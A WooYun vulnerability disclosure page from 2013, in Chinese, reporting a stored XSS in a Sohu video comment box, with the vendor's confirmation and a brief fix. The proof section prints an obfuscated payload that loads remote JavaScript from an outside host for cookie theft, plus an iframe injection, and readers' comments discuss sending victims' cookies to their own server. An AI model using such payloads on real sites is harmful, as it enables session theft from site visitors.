当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-034003

漏洞标题:搜狐视频某重要功能储存XSS

相关厂商:搜狐

漏洞作者: px1624

提交时间:2013-08-11 08:56

修复时间:2013-09-25 08:57

公开时间:2013-09-25 08:57

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-11: 细节已通知厂商并且等待厂商处理中
2013-08-11: 厂商已经确认,细节仅向厂商公开
2013-08-21: 细节向核心白帽子及相关领域专家公开
2013-08-31: 细节向普通白帽子公开
2013-09-10: 细节向实习白帽子公开
2013-09-25: 细节向公众公开

简要描述:

想看《中国好声音》其他视频网站貌似没有播放版权,就去搜狐看了,看的人真多,流量很大。这位置要是有个XSS那是不是很给力,而且还能调用任意外部js文件~

详细说明:

真没想到诶,评论框位置居然存在xss,而且是基本啥都没过滤的那种。
可以随意调用外部js文件。
sae有些问题xsser.me暂时用不了,没法截抓取cookie的图了。
危害:看下面第一个图,此利用代码插入后,只要有一个人回复,原网页就会多生成一条script调用外部js的代码,所以不存在xss留言被刷的不显示了,xss代码就失效的问题。

漏洞证明:

诶,刷评论的人太多了,截图难度略大,还好我手快截图了两张。
1 调用外部js文件。插入的利用代码

<textarea/>"><img src=1 onerror="with(document)body.appendChild(createElement(String.fromCharCode(115,99,114,105,112,116))).src='//pxss.sinaapp.com/l6OBji'">


QQ截图20130809221044.png


2 插入百度首页。插入的利用代码

<textarea/><iframe src=http://www.baidu.com/></iframe>


QQ截图20130809221646.png

修复方案:

过滤xss特殊字符

版权声明:转载请注明来源 px1624@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2013-08-11 09:08

厂商回复:

感谢支持。

最新状态:

暂无


漏洞评价:

评论

  1. 2013-08-11 13:47 | 猫友 ( 路人 | Rank:0 漏洞数:2 | 毕业于中国人民公安大学,现为某市公安特警...)

    传说中的沙发吗?

  2. 2013-08-11 14:14 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @猫友 我去,我还以为会走小厂商流程呢。。。

  3. 2013-09-10 09:33 | Manning ( 普通白帽子 | Rank:559 漏洞数:78 | 就恨自己服务器太少)

    这种web代码啊

  4. 2013-11-19 17:31 | 大亮 ( 普通白帽子 | Rank:306 漏洞数:65 | 慢慢挖洞)

    我想知道,这中情况别人的cookie怎么弄到我服务器的网页上,请指教

  5. 2014-05-09 22:48 | 大师哥 ( 路人 | Rank:4 漏洞数:2 | I am the government)

    @大亮 可以发送的吧